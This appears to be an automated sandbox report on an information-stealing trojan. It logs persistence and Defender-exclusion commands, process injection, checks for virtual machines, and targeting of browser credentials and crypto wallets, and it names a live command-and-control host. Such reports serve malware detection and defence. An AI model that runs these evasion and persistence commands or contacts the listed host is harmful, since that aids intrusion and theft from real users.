                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Code function: 0_2_02DFF140 push eax; iretd 0_2_02DFF141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_071A4990 pushfd ; retf 7_2_071A4991
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_0086F140 push eax; iretd 9_2_0086F141
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_04BA07C2 pushad ; retf 9_2_04BA07C6
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_04BAD358 pushad ; ret 9_2_04BAD359
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_04BA0903 pushad ; iretd 9_2_04BA0915
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F28658 push eax; ret 9_2_06F28659
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F2AE30 push es; iretd 9_2_06F2AE3C
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F29F36 push cs; retf 9_2_06F29F37
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F29DA0 pushad ; iretd 9_2_06F29DA1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F22D70 push ecx; retf 5506h 9_2_06F22DA6
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F2989A push eax; retf 9_2_06F298A1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Code function: 9_2_06F20006 push es; retf 9_2_06F2001C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_02C21863 push cs; ret 13_2_02C21866
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_02C21867 push cs; ret 13_2_02C2186A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_06DF0E68 push es; ret 13_2_06DF0E00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_06DF0DF0 push es; ret 13_2_06DF0E00
                    Source: 13P2mxLaQk.exe Static PE information: section name: .text entropy: 7.614575434550098
                    Source: VWGccZGgix.exe.0.dr Static PE information: section name: .text entropy: 7.614575434550098
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File created: C:\Users\user\AppData\Roaming\VWGccZGgix.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49713
                    Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49714
                    Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49716
                    Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 34221
                    Source: unknown Network traffic detected: HTTP traffic on port 34221 -> 49721
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: VWGccZGgix.exe PID: 5292, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: 2DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: 5000000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: 9960000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: 8300000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: A960000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: B960000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 860000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 25A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 45A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 89B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 7350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: 99B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: A9B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7288
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 3808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4486
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2586
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5247
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe TID: 1736 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680 Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe TID: 4584 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: RegSvcs.exe, 00000007.00000002.1595769965.00000000011D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                    Source: RegSvcs.exe, 0000000D.00000002.1625678293.0000000001029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1458811526.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EA3008
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B38008
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: RegSvcs.exe, 0000000D.00000002.1657406035.0000000006385000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3832, type: MEMORYSTR
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\wallets
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3832, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 Scheduled Task/Job | 311 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 331 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 3 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 22 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
[Behavior graph: ID: 1527904, Sample: 13P2mxLaQk.exe, Startdate: 07/10/2024, Architecture: WINDOWS, Score: 100]

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
DNS/IP: billred229102.duckdns.org (Uses dynamic DNS services); api.ip.sb

Process tree shown in the graph:
• 13P2mxLaQk.exe (started)
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Adds a directory exclusion to Windows Defender
  Dropped: C:\Users\user\AppData\...\VWGccZGgix.exe, PE32; C:\Users\...\VWGccZGgix.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\Local\...\tmp2CA3.tmp, XML; C:\Users\user\AppData\...\13P2mxLaQk.exe.log, ASCII
  • RegSvcs.exe (started) -> conhost.exe
    Network: billred229102.duckdns.org, 45.88.88.45, 34221, 49707, 49710, LVLT-10753US, Bulgaria
    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
  • schtasks.exe (started) -> conhost.exe
  • powershell.exe (started) -> conhost.exe, WmiPrvSE.exe
    Signatures: Loading BitLocker PowerShell Module
• VWGccZGgix.exe (started)
  Signatures: Multi AV Scanner detection for dropped file; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  • RegSvcs.exe (started) -> conhost.exe
    Signatures: Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
  • schtasks.exe -> conhost.exe

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| 13P2mxLaQk.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
| 13P2mxLaQk.exe | 100% | Avira | HEUR/AGEN.1306285 | |
| 13P2mxLaQk.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Roaming\VWGccZGgix.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
| https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe | |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
| https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
| https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | URL Reputation | safe | |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/soap/actor/next | 0% | URL Reputation | safe | |
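| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| billred229102.duckdns.org | 45.88.88.45 | true | true | | unknown |
| api.ip.sb | unknown | unknown | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://billred229102.duckdns.org:34221/ | true | | unknown |
| billred229102.duckdns.org:34221 | true | | unknown |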
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 45.88.88.45 | billred229102.duckdns.org | Bulgaria | | 10753 | LVLT-10753US | true |
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1527904
                                                                      Start date and time:2024-10-07 11:28:17 +02:00
                                                                      Joe Sandbox product:CloudBasic
